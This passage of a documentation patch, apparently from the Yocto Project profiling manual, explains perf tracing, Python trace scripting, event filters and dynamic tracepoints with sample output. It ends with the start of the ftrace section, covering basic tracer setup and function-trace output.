+sched:sched_switch tracepoint, which shows the relative costs of various
+paths to sched_wakeup (note that sched_wakeup is the name of the
+tracepoint - it's actually defined just inside ttwu_do_wakeup(), which
+accounts for the function name actually displayed in the profile:
+
+.. code-block:: c
+
+ /*
+ * Mark the task runnable and perform wakeup-preemption.
+ */
+ static void
+ ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
+ {
+ trace_sched_wakeup(p, true);
+ .
+ .
+ .
+ }
+
+A couple of the more interesting
+callchains are expanded and displayed above, basically some network
+receive paths that presumably end up waking up wget (busybox) when
+network data is ready.
+
+Note that because tracepoints are normally used for tracing, the default
+sampling period for tracepoints is 1 i.e. for tracepoints perf will
+sample on every event occurrence (this can be changed using the -c
+option). This is in contrast to hardware counters such as for example
+the default 'cycles' hardware counter used for normal profiling, where
+sampling periods are much higher (in the thousands) because profiling
+should have as low an overhead as possible and sampling on every cycle
+would be prohibitively expensive.
+
+Using perf to do Basic Tracing
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Profiling is a great tool for solving many problems or for getting a
+high-level view of what's going on with a workload or across the system.
+It is however by definition an approximation, as suggested by the most
+prominent word associated with it, 'sampling'. On the one hand, it
+allows a representative picture of what's going on in the system to be
+cheaply taken, but on the other hand, that cheapness limits its utility
+when that data suggests a need to 'dive down' more deeply to discover
+what's really going on. In such cases, the only way to see what's really
+going on is to be able to look at (or summarize more intelligently) the
+individual steps that go into the higher-level behavior exposed by the
+coarse-grained profiling data.
+
+As a concrete example, we can trace all the events we think might be
+applicable to our workload: ::
+
+ root@crownbay:~# perf record -g -e skb:* -e net:* -e napi:* -e sched:sched_switch -e sched:sched_wakeup -e irq:*
+ -e syscalls:sys_enter_read -e syscalls:sys_exit_read -e syscalls:sys_enter_write -e syscalls:sys_exit_write
+ wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+
+We can look at the raw trace output using 'perf script' with no
+arguments: ::
+
+ root@crownbay:~# perf script
+
+ perf 1262 [000] 11624.857082: sys_exit_read: 0x0
+ perf 1262 [000] 11624.857193: sched_wakeup: comm=migration/0 pid=6 prio=0 success=1 target_cpu=000
+ wget 1262 [001] 11624.858021: softirq_raise: vec=1 [action=TIMER]
+ wget 1262 [001] 11624.858074: softirq_entry: vec=1 [action=TIMER]
+ wget 1262 [001] 11624.858081: softirq_exit: vec=1 [action=TIMER]
+ wget 1262 [001] 11624.858166: sys_enter_read: fd: 0x0003, buf: 0xbf82c940, count: 0x0200
+ wget 1262 [001] 11624.858177: sys_exit_read: 0x200
+ wget 1262 [001] 11624.858878: kfree_skb: skbaddr=0xeb248d80 protocol=0 location=0xc15a5308
+ wget 1262 [001] 11624.858945: kfree_skb: skbaddr=0xeb248000 protocol=0 location=0xc15a5308
+ wget 1262 [001] 11624.859020: softirq_raise: vec=1 [action=TIMER]
+ wget 1262 [001] 11624.859076: softirq_entry: vec=1 [action=TIMER]
+ wget 1262 [001] 11624.859083: softirq_exit: vec=1 [action=TIMER]
+ wget 1262 [001] 11624.859167: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
+ wget 1262 [001] 11624.859192: sys_exit_read: 0x1d7
+ wget 1262 [001] 11624.859228: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
+ wget 1262 [001] 11624.859233: sys_exit_read: 0x0
+ wget 1262 [001] 11624.859573: sys_enter_read: fd: 0x0003, buf: 0xbf82c580, count: 0x0200
+ wget 1262 [001] 11624.859584: sys_exit_read: 0x200
+ wget 1262 [001] 11624.859864: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
+ wget 1262 [001] 11624.859888: sys_exit_read: 0x400
+ wget 1262 [001] 11624.859935: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
+ wget 1262 [001] 11624.859944: sys_exit_read: 0x400
+
+This gives us a detailed timestamped sequence of events that occurred within the
+workload with respect to those events.
+
+In many ways, profiling can be viewed as a subset of tracing -
+theoretically, if you have a set of trace events that's sufficient to
+capture all the important aspects of a workload, you can derive any of
+the results or views that a profiling run can.
+
+Another aspect of traditional profiling is that while powerful in many
+ways, it's limited by the granularity of the underlying data. Profiling
+tools offer various ways of sorting and presenting the sample data,
+which make it much more useful and amenable to user experimentation, but
+in the end it can't be used in an open-ended way to extract data that
+just isn't present as a consequence of the fact that conceptually, most
+of it has been thrown away.
+
+Full-blown detailed tracing data does however offer the opportunity to
+manipulate and present the information collected during a tracing run in
+an infinite variety of ways.
+
+Another way to look at it is that there are only so many ways that the
+'primitive' counters can be used on their own to generate interesting
+output; to get anything more complicated than simple counts requires
+some amount of additional logic, which is typically very specific to the
+problem at hand. For example, if we wanted to make use of a 'counter'
+that maps to the value of the time difference between when a process was
+scheduled to run on a processor and the time it actually ran, we
+wouldn't expect such a counter to exist on its own, but we could derive
+one called say 'wakeup_latency' and use it to extract a useful view of
+that metric from trace data. Likewise, we really can't figure out from
+standard profiling tools how much data every process on the system reads
+and writes, along with how many of those reads and writes fail
+completely. If we have sufficient trace data, however, we could with the
+right tools easily extract and present that information, but we'd need
+something other than pre-canned profiling tools to do that.
+
+Luckily, there is a general-purpose way to handle such needs, called
+'programming languages'. Making programming languages easily available
+to apply to such problems given the specific format of data is called a
+'programming language binding' for that data and language. Perf supports
+two programming language bindings, one for Python and one for Perl.
+
+.. admonition:: Tying it Together
+
+ Language bindings for manipulating and aggregating trace data are of
+ course not a new idea. One of the first projects to do this was IBM's
+ DProbes dpcc compiler, an ANSI C compiler which targeted a low-level
+ assembly language running on an in-kernel interpreter on the target
+ system. This is exactly analogous to what Sun's DTrace did, except
+ that DTrace invented its own language for the purpose. Systemtap,
+ heavily inspired by DTrace, also created its own one-off language,
+ but rather than running the product on an in-kernel interpreter,
+ created an elaborate compiler-based machinery to translate its
+ language into kernel modules written in C.
+
+Now that we have the trace data in perf.data, we can use 'perf script
+-g' to generate a skeleton script with handlers for the read/write
+entry/exit events we recorded: ::
+
+ root@crownbay:~# perf script -g python
+ generated Python script: perf-script.py
+
+The skeleton script simply creates a python function for each event type in the
+perf.data file. The body of each function simply prints the event name along
+with its parameters. For example:
+
+.. code-block:: python
+
+ def net__netif_rx(event_name, context, common_cpu,
+ common_secs, common_nsecs, common_pid, common_comm,
+ skbaddr, len, name):
+ print_header(event_name, common_cpu, common_secs, common_nsecs,
+ common_pid, common_comm)
+
+ print "skbaddr=%u, len=%u, name=%s\n" % (skbaddr, len, name),
+
+We can run that script directly to print all of the events contained in the
+perf.data file: ::
+
+ root@crownbay:~# perf script -s perf-script.py
+
+ in trace_begin
+ syscalls__sys_exit_read 0 11624.857082795 1262 perf nr=3, ret=0
+ sched__sched_wakeup 0 11624.857193498 1262 perf comm=migration/0, pid=6, prio=0, success=1, target_cpu=0
+ irq__softirq_raise 1 11624.858021635 1262 wget vec=TIMER
+ irq__softirq_entry 1 11624.858074075 1262 wget vec=TIMER
+ irq__softirq_exit 1 11624.858081389 1262 wget vec=TIMER
+ syscalls__sys_enter_read 1 11624.858166434 1262 wget nr=3, fd=3, buf=3213019456, count=512
+ syscalls__sys_exit_read 1 11624.858177924 1262 wget nr=3, ret=512
+ skb__kfree_skb 1 11624.858878188 1262 wget skbaddr=3945041280, location=3243922184, protocol=0
+ skb__kfree_skb 1 11624.858945608 1262 wget skbaddr=3945037824, location=3243922184, protocol=0
+ irq__softirq_raise 1 11624.859020942 1262 wget vec=TIMER
+ irq__softirq_entry 1 11624.859076935 1262 wget vec=TIMER
+ irq__softirq_exit 1 11624.859083469 1262 wget vec=TIMER
+ syscalls__sys_enter_read 1 11624.859167565 1262 wget nr=3, fd=3, buf=3077701632, count=1024
+ syscalls__sys_exit_read 1 11624.859192533 1262 wget nr=3, ret=471
+ syscalls__sys_enter_read 1 11624.859228072 1262 wget nr=3, fd=3, buf=3077701632, count=1024
+ syscalls__sys_exit_read 1 11624.859233707 1262 wget nr=3, ret=0
+ syscalls__sys_enter_read 1 11624.859573008 1262 wget nr=3, fd=3, buf=3213018496, count=512
+ syscalls__sys_exit_read 1 11624.859584818 1262 wget nr=3, ret=512
+ syscalls__sys_enter_read 1 11624.859864562 1262 wget nr=3, fd=3, buf=3077701632, count=1024
+ syscalls__sys_exit_read 1 11624.859888770 1262 wget nr=3, ret=1024
+ syscalls__sys_enter_read 1 11624.859935140 1262 wget nr=3, fd=3, buf=3077701632, count=1024
+ syscalls__sys_exit_read 1 11624.859944032 1262 wget nr=3, ret=1024
+
+That in itself isn't very useful; after all, we can accomplish pretty much the
+same thing by simply running 'perf script' without arguments in the same
+directory as the perf.data file.
+
+We can however replace the print statements in the generated function
+bodies with whatever we want, and thereby make it infinitely more
+useful.
+
+As a simple example, let's just replace the print statements in the
+function bodies with a simple function that does nothing but increment a
+per-event count. When the program is run against a perf.data file, each
+time a particular event is encountered, a tally is incremented for that
+event. For example:
+
+.. code-block:: python
+
+ def net__netif_rx(event_name, context, common_cpu,
+ common_secs, common_nsecs, common_pid, common_comm,
+ skbaddr, len, name):
+ inc_counts(event_name)
+
+Each event handler function in the generated code
+is modified to do this. For convenience, we define a common function
+called inc_counts() that each handler calls; inc_counts() simply tallies
+a count for each event using the 'counts' hash, which is a specialized
+hash function that does Perl-like autovivification, a capability that's
+extremely useful for kinds of multi-level aggregation commonly used in
+processing traces (see perf's documentation on the Python language
+binding for details):
+
+.. code-block:: python
+
+ counts = autodict()
+
+ def inc_counts(event_name):
+ try:
+ counts[event_name] += 1
+ except TypeError:
+ counts[event_name] = 1
+
+Finally, at the end of the trace processing run, we want to print the
+result of all the per-event tallies. For that, we use the special
+'trace_end()' function:
+
+.. code-block:: python
+
+ def trace_end():
+ for event_name, count in counts.iteritems():
+ print "%-40s %10s\n" % (event_name, count)
+
+The end result is a summary of all the events recorded in the trace: ::
+
+ skb__skb_copy_datagram_iovec 13148
+ irq__softirq_entry 4796
+ irq__irq_handler_exit 3805
+ irq__softirq_exit 4795
+ syscalls__sys_enter_write 8990
+ net__net_dev_xmit 652
+ skb__kfree_skb 4047
+ sched__sched_wakeup 1155
+ irq__irq_handler_entry 3804
+ irq__softirq_raise 4799
+ net__net_dev_queue 652
+ syscalls__sys_enter_read 17599
+ net__netif_receive_skb 1743
+ syscalls__sys_exit_read 17598
+ net__netif_rx 2
+ napi__napi_poll 1877
+ syscalls__sys_exit_write 8990
+
+Note that this is
+pretty much exactly the same information we get from 'perf stat', which
+goes a little way to support the idea mentioned previously that given
+the right kind of trace data, higher-level profiling-type summaries can
+be derived from it.
+
+Documentation on using the `'perf script' python
+binding <http://linux.die.net/man/1/perf-script-python>`__.
+
+System-Wide Tracing and Profiling
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The examples so far have focused on tracing a particular program or
+workload - in other words, every profiling run has specified the program
+to profile in the command-line e.g. 'perf record wget ...'.
+
+It's also possible, and more interesting in many cases, to run a
+system-wide profile or trace while running the workload in a separate
+shell.
+
+To do system-wide profiling or tracing, you typically use the -a flag to
+'perf record'.
+
+To demonstrate this, open up one window and start the profile using the
+-a flag (press Ctrl-C to stop tracing): ::
+
+ root@crownbay:~# perf record -g -a
+ ^C[ perf record: Woken up 6 times to write data ]
+ [ perf record: Captured and wrote 1.400 MB perf.data (~61172 samples) ]
+
+In another window, run the wget test: ::
+
+ root@crownbay:~# wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+ Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+ linux-2.6.19.2.tar.b 100% \|*******************************\| 41727k 0:00:00 ETA
+
+Here we see entries not only for our wget load, but for
+other processes running on the system as well:
+
+.. image:: figures/perf-systemwide.png
+ :align: center
+
+In the snapshot above, we can see callchains that originate in libc, and
+a callchain from Xorg that demonstrates that we're using a proprietary X
+driver in userspace (notice the presence of 'PVR' and some other
+unresolvable symbols in the expanded Xorg callchain).
+
+Note also that we have both kernel and userspace entries in the above
+snapshot. We can also tell perf to focus on userspace but providing a
+modifier, in this case 'u', to the 'cycles' hardware counter when we
+record a profile: ::
+
+ root@crownbay:~# perf record -g -a -e cycles:u
+ ^C[ perf record: Woken up 2 times to write data ]
+ [ perf record: Captured and wrote 0.376 MB perf.data (~16443 samples) ]
+
+.. image:: figures/perf-report-cycles-u.png
+ :align: center
+
+Notice in the screenshot above, we see only userspace entries ([.])
+
+Finally, we can press 'enter' on a leaf node and select the 'Zoom into
+DSO' menu item to show only entries associated with a specific DSO. In
+the screenshot below, we've zoomed into the 'libc' DSO which shows all
+the entries associated with the libc-xxx.so DSO.
+
+.. image:: figures/perf-systemwide-libc.png
+ :align: center
+
+We can also use the system-wide -a switch to do system-wide tracing.
+Here we'll trace a couple of scheduler events: ::
+
+ root@crownbay:~# perf record -a -e sched:sched_switch -e sched:sched_wakeup
+ ^C[ perf record: Woken up 38 times to write data ]
+ [ perf record: Captured and wrote 9.780 MB perf.data (~427299 samples) ]
+
+We can look at the raw output using 'perf script' with no arguments: ::
+
+ root@crownbay:~# perf script
+
+ perf 1383 [001] 6171.460045: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+ perf 1383 [001] 6171.460066: sched_switch: prev_comm=perf prev_pid=1383 prev_prio=120 prev_state=R+ ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
+ kworker/1:1 21 [001] 6171.460093: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=perf next_pid=1383 next_prio=120
+ swapper 0 [000] 6171.468063: sched_wakeup: comm=kworker/0:3 pid=1209 prio=120 success=1 target_cpu=000
+ swapper 0 [000] 6171.468107: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
+ kworker/0:3 1209 [000] 6171.468143: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
+ perf 1383 [001] 6171.470039: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+ perf 1383 [001] 6171.470058: sched_switch: prev_comm=perf prev_pid=1383 prev_prio=120 prev_state=R+ ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
+ kworker/1:1 21 [001] 6171.470082: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=perf next_pid=1383 next_prio=120
+ perf 1383 [001] 6171.480035: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+
+.. _perf-filtering:
+
+Filtering
+^^^^^^^^^
+
+Notice that there are a lot of events that don't really have anything to
+do with what we're interested in, namely events that schedule 'perf'
+itself in and out or that wake perf up. We can get rid of those by using
+the '--filter' option - for each event we specify using -e, we can add a
+--filter after that to filter out trace events that contain fields with
+specific values: ::
+
+ root@crownbay:~# perf record -a -e sched:sched_switch --filter 'next_comm != perf && prev_comm != perf' -e sched:sched_wakeup --filter 'comm != perf'
+ ^C[ perf record: Woken up 38 times to write data ]
+ [ perf record: Captured and wrote 9.688 MB perf.data (~423279 samples) ]
+
+
+ root@crownbay:~# perf script
+
+ swapper 0 [000] 7932.162180: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
+ kworker/0:3 1209 [000] 7932.162236: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
+ perf 1407 [001] 7932.170048: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+ perf 1407 [001] 7932.180044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+ perf 1407 [001] 7932.190038: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+ perf 1407 [001] 7932.200044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+ perf 1407 [001] 7932.210044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+ perf 1407 [001] 7932.220044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+ swapper 0 [001] 7932.230111: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+ swapper 0 [001] 7932.230146: sched_switch: prev_comm=swapper/1 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
+ kworker/1:1 21 [001] 7932.230205: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=swapper/1 next_pid=0 next_prio=120
+ swapper 0 [000] 7932.326109: sched_wakeup: comm=kworker/0:3 pid=1209 prio=120 success=1 target_cpu=000
+ swapper 0 [000] 7932.326171: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
+ kworker/0:3 1209 [000] 7932.326214: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
+
+In this case, we've filtered out all events that have
+'perf' in their 'comm' or 'comm_prev' or 'comm_next' fields. Notice that
+there are still events recorded for perf, but notice that those events
+don't have values of 'perf' for the filtered fields. To completely
+filter out anything from perf will require a bit more work, but for the
+purpose of demonstrating how to use filters, it's close enough.
+
+.. admonition:: Tying it Together
+
+ These are exactly the same set of event filters defined by the trace
+ event subsystem. See the ftrace/tracecmd/kernelshark section for more
+ discussion about these event filters.
+
+.. admonition:: Tying it Together
+
+ These event filters are implemented by a special-purpose
+ pseudo-interpreter in the kernel and are an integral and
+ indispensable part of the perf design as it relates to tracing.
+ kernel-based event filters provide a mechanism to precisely throttle
+ the event stream that appears in user space, where it makes sense to
+ provide bindings to real programming languages for postprocessing the
+ event stream. This architecture allows for the intelligent and
+ flexible partitioning of processing between the kernel and user
+ space. Contrast this with other tools such as SystemTap, which does
+ all of its processing in the kernel and as such requires a special
+ project-defined language in order to accommodate that design, or
+ LTTng, where everything is sent to userspace and as such requires a
+ super-efficient kernel-to-userspace transport mechanism in order to
+ function properly. While perf certainly can benefit from for instance
+ advances in the design of the transport, it doesn't fundamentally
+ depend on them. Basically, if you find that your perf tracing
+ application is causing buffer I/O overruns, it probably means that
+ you aren't taking enough advantage of the kernel filtering engine.
+
+Using Dynamic Tracepoints
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+perf isn't restricted to the fixed set of static tracepoints listed by
+'perf list'. Users can also add their own 'dynamic' tracepoints anywhere
+in the kernel. For instance, suppose we want to define our own
+tracepoint on do_fork(). We can do that using the 'perf probe' perf
+subcommand: ::
+
+ root@crownbay:~# perf probe do_fork
+ Added new event:
+ probe:do_fork (on do_fork)
+
+ You can now use it in all perf tools, such as:
+
+ perf record -e probe:do_fork -aR sleep 1
+
+Adding a new tracepoint via
+'perf probe' results in an event with all the expected files and format
+in /sys/kernel/debug/tracing/events, just the same as for static
+tracepoints (as discussed in more detail in the trace events subsystem
+section: ::
+
+ root@crownbay:/sys/kernel/debug/tracing/events/probe/do_fork# ls -al
+ drwxr-xr-x 2 root root 0 Oct 28 11:42 .
+ drwxr-xr-x 3 root root 0 Oct 28 11:42 ..
+ -rw-r--r-- 1 root root 0 Oct 28 11:42 enable
+ -rw-r--r-- 1 root root 0 Oct 28 11:42 filter
+ -r--r--r-- 1 root root 0 Oct 28 11:42 format
+ -r--r--r-- 1 root root 0 Oct 28 11:42 id
+
+ root@crownbay:/sys/kernel/debug/tracing/events/probe/do_fork# cat format
+ name: do_fork
+ ID: 944
+ format:
+ field:unsigned short common_type; offset:0; size:2; signed:0;
+ field:unsigned char common_flags; offset:2; size:1; signed:0;
+ field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
+ field:int common_pid; offset:4; size:4; signed:1;
+ field:int common_padding; offset:8; size:4; signed:1;
+
+ field:unsigned long __probe_ip; offset:12; size:4; signed:0;
+
+ print fmt: "(%lx)", REC->__probe_ip
+
+We can list all dynamic tracepoints currently in
+existence: ::
+
+ root@crownbay:~# perf probe -l
+ probe:do_fork (on do_fork)
+ probe:schedule (on schedule)
+
+Let's record system-wide ('sleep 30' is a
+trick for recording system-wide but basically do nothing and then wake
+up after 30 seconds): ::
+
+ root@crownbay:~# perf record -g -a -e probe:do_fork sleep 30
+ [ perf record: Woken up 1 times to write data ]
+ [ perf record: Captured and wrote 0.087 MB perf.data (~3812 samples) ]
+
+Using 'perf script' we can see each do_fork event that fired: ::
+
+ root@crownbay:~# perf script
+
+ # ========
+ # captured on: Sun Oct 28 11:55:18 2012
+ # hostname : crownbay
+ # os release : 3.4.11-yocto-standard
+ # perf version : 3.4.11
+ # arch : i686
+ # nrcpus online : 2
+ # nrcpus avail : 2
+ # cpudesc : Intel(R) Atom(TM) CPU E660 @ 1.30GHz
+ # cpuid : GenuineIntel,6,38,1
+ # total memory : 1017184 kB
+ # cmdline : /usr/bin/perf record -g -a -e probe:do_fork sleep 30
+ # event : name = probe:do_fork, type = 2, config = 0x3b0, config1 = 0x0, config2 = 0x0, excl_usr = 0, excl_kern
+ = 0, id = { 5, 6 }
+ # HEADER_CPU_TOPOLOGY info available, use -I to display
+ # ========
+ #
+ matchbox-deskto 1197 [001] 34211.378318: do_fork: (c1028460)
+ matchbox-deskto 1295 [001] 34211.380388: do_fork: (c1028460)
+ pcmanfm 1296 [000] 34211.632350: do_fork: (c1028460)
+ pcmanfm 1296 [000] 34211.639917: do_fork: (c1028460)
+ matchbox-deskto 1197 [001] 34217.541603: do_fork: (c1028460)
+ matchbox-deskto 1299 [001] 34217.543584: do_fork: (c1028460)
+ gthumb 1300 [001] 34217.697451: do_fork: (c1028460)
+ gthumb 1300 [001] 34219.085734: do_fork: (c1028460)
+ gthumb 1300 [000] 34219.121351: do_fork: (c1028460)
+ gthumb 1300 [001] 34219.264551: do_fork: (c1028460)
+ pcmanfm 1296 [000] 34219.590380: do_fork: (c1028460)
+ matchbox-deskto 1197 [001] 34224.955965: do_fork: (c1028460)
+ matchbox-deskto 1306 [001] 34224.957972: do_fork: (c1028460)
+ matchbox-termin 1307 [000] 34225.038214: do_fork: (c1028460)
+ matchbox-termin 1307 [001] 34225.044218: do_fork: (c1028460)
+ matchbox-termin 1307 [000] 34225.046442: do_fork: (c1028460)
+ matchbox-deskto 1197 [001] 34237.112138: do_fork: (c1028460)
+ matchbox-deskto 1311 [001] 34237.114106: do_fork: (c1028460)
+ gaku 1312 [000] 34237.202388: do_fork: (c1028460)
+
+And using 'perf report' on the same file, we can see the
+callgraphs from starting a few programs during those 30 seconds:
+
+.. image:: figures/perf-probe-do_fork-profile.png
+ :align: center
+
+.. admonition:: Tying it Together
+
+ The trace events subsystem accommodate static and dynamic tracepoints
+ in exactly the same way - there's no difference as far as the
+ infrastructure is concerned. See the ftrace section for more details
+ on the trace event subsystem.
+
+.. admonition:: Tying it Together
+
+ Dynamic tracepoints are implemented under the covers by kprobes and
+ uprobes. kprobes and uprobes are also used by and in fact are the
+ main focus of SystemTap.
+
+.. _perf-documentation:
+
+Perf Documentation
+------------------
+
+Online versions of the man pages for the commands discussed in this
+section can be found here:
+
+- The `'perf stat' manpage <http://linux.die.net/man/1/perf-stat>`__.
+
+- The `'perf record'
+ manpage <http://linux.die.net/man/1/perf-record>`__.
+
+- The `'perf report'
+ manpage <http://linux.die.net/man/1/perf-report>`__.
+
+- The `'perf probe' manpage <http://linux.die.net/man/1/perf-probe>`__.
+
+- The `'perf script'
+ manpage <http://linux.die.net/man/1/perf-script>`__.
+
+- Documentation on using the `'perf script' python
+ binding <http://linux.die.net/man/1/perf-script-python>`__.
+
+- The top-level `perf(1) manpage <http://linux.die.net/man/1/perf>`__.
+
+Normally, you should be able to invoke the man pages via perf itself
+e.g. 'perf help' or 'perf help record'.
+
+However, by default Yocto doesn't install man pages, but perf invokes
+the man pages for most help functionality. This is a bug and is being
+addressed by a Yocto bug: :yocto_bugs:`Bug 3388 - perf: enable man pages for basic
+'help' functionality </show_bug.cgi?id=3388>`.
+
+The man pages in text form, along with some other files, such as a set
+of examples, can be found in the 'perf' directory of the kernel tree: ::
+
+ tools/perf/Documentation
+
+There's also a nice perf tutorial on the perf
+wiki that goes into more detail than we do here in certain areas: `Perf
+Tutorial <https://perf.wiki.kernel.org/index.php/Tutorial>`__
+
+.. _profile-manual-ftrace:
+
+ftrace
+======
+
+'ftrace' literally refers to the 'ftrace function tracer' but in reality
+this encompasses a number of related tracers along with the
+infrastructure that they all make use of.
+
+.. _ftrace-setup:
+
+ftrace Setup
+------------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section.
+
+ftrace, trace-cmd, and kernelshark run on the target system, and are
+ready to go out-of-the-box - no additional setup is necessary. For the
+rest of this section we assume you've ssh'ed to the host and will be
+running ftrace on the target. kernelshark is a GUI application and if
+you use the '-X' option to ssh you can have the kernelshark GUI run on
+the target but display remotely on the host if you want.
+
+Basic ftrace usage
+------------------
+
+'ftrace' essentially refers to everything included in the /tracing
+directory of the mounted debugfs filesystem (Yocto follows the standard
+convention and mounts it at /sys/kernel/debug). Here's a listing of all
+the files found in /sys/kernel/debug/tracing on a Yocto system: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing# ls
+ README kprobe_events trace
+ available_events kprobe_profile trace_clock
+ available_filter_functions options trace_marker
+ available_tracers per_cpu trace_options
+ buffer_size_kb printk_formats trace_pipe
+ buffer_total_size_kb saved_cmdlines tracing_cpumask
+ current_tracer set_event tracing_enabled
+ dyn_ftrace_total_info set_ftrace_filter tracing_on
+ enabled_functions set_ftrace_notrace tracing_thresh
+ events set_ftrace_pid
+ free_buffer set_graph_function
+
+The files listed above are used for various purposes
+- some relate directly to the tracers themselves, others are used to set
+tracing options, and yet others actually contain the tracing output when
+a tracer is in effect. Some of the functions can be guessed from their
+names, others need explanation; in any case, we'll cover some of the
+files we see here below but for an explanation of the others, please see
+the ftrace documentation.
+
+We'll start by looking at some of the available built-in tracers.
+
+cat'ing the 'available_tracers' file lists the set of available tracers: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing# cat available_tracers
+ blk function_graph function nop
+
+The 'current_tracer' file contains the tracer currently in effect: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing# cat current_tracer
+ nop
+
+The above listing of current_tracer shows that the
+'nop' tracer is in effect, which is just another way of saying that
+there's actually no tracer currently in effect.
+
+echo'ing one of the available_tracers into current_tracer makes the
+specified tracer the current tracer: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing# echo function > current_tracer
+ root@sugarbay:/sys/kernel/debug/tracing# cat current_tracer
+ function
+
+The above sets the current tracer to be the 'function tracer'. This tracer
+traces every function call in the kernel and makes it available as the
+contents of the 'trace' file. Reading the 'trace' file lists the
+currently buffered function calls that have been traced by the function
+tracer: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
+
+ # tracer: function
+ #
+ # entries-in-buffer/entries-written: 310629/766471 #P:8
+ #
+ # _-----=> irqs-off
+ # / _----=> need-resched
+ # | / _---=> hardirq/softirq
+ # || / _--=> preempt-depth
+ # ||| / delay
+ # TASK-PID CPU# |||| TIMESTAMP FUNCTION
+ # | | | |||| | |
+ <idle>-0 [004] d..1 470.867169: ktime_get_real <-intel_idle
+ <idle>-0 [004] d..1 470.867170: getnstimeofday <-ktime_get_real
+ <idle>-0 [004] d..1 470.867171: ns_to_timeval <-intel_idle
+ <idle>-0 [004] d..1 470.867171: ns_to_timespec <-ns_to_timeval
+ <idle>-0 [004] d..1 470.867172: smp_apic_timer_interrupt <-apic_timer_interrupt
+ <idle>-0 [004] d..1 470.867172: native_apic_mem_write <-smp_apic_timer_interrupt
+ <idle>-0 [004] d..1 470.867172: irq_enter <-smp_apic_timer_interrupt
+ <idle>-0 [004] d..1 470.867172: rcu_irq_enter <-irq_enter
+ <idle>-0 [004] d..1 470.867173: rcu_idle_exit_common.isra.33 <-rcu_irq_enter
+ <idle>-0 [004] d..1 470.867173: local_bh_disable <-irq_enter
+ <idle>-0 [004] d..1 470.867173: add_preempt_count <-local_bh_disable
+ <idle>-0 [004] d.s1 470.867174: tick_check_idle <-irq_enter
+ <idle>-0 [004] d.s1 470.867174: tick_check_oneshot_broadcast <-tick_check_idle
+ <idle>-0 [004] d.s1 470.867174: ktime_get <-tick_check_idle
+ <idle>-0 [004] d.s1 470.867174: tick_nohz_stop_idle <-tick_check_idle
+ <idle>-0 [004] d.s1 470.867175: update_ts_time_stats <-tick_nohz_stop_idle
+ <idle>-0 [004] d.s1 470.867175: nr_iowait_cpu <-update_ts_time_stats
+ <idle>-0 [004] d.s1 470.867175: tick_do_update_jiffies64 <-tick_check_idle
+ <idle>-0 [004] d.s1 470.867175: _raw_spin_lock <-tick_do_update_jiffies64
+ <idle>-0 [004] d.s1 470.867176: add_preempt_count <-_raw_spin_lock
+ <idle>-0 [004] d.s2 470.867176: do_timer <-tick_do_update_jiffies64
+ <idle>-0 [004] d.s2 470.867176: _raw_spin_lock <-do_timer
+ <idle>-0 [004] d.s2 470.867176: add_preempt_count <-_raw_spin_lock
+ <idle>-0 [004] d.s3 470.867177: ntp_tick_length <-do_timer
+ <idle>-0 [004] d.s3 470.867177: _raw_spin_lock_irqsave <-ntp_tick_length
+ .
+ .
+ .
+
+Each line in the trace above shows what was happening in the kernel on a given
+cpu, to the level of detail of function calls. Each entry shows the function
+called, followed by its caller (after the arrow).
+
+The function tracer gives you an extremely detailed idea of what the
+kernel was doing at the point in time the trace was taken, and is a
+great way to learn about how the kernel code works in a dynamic sense.
+
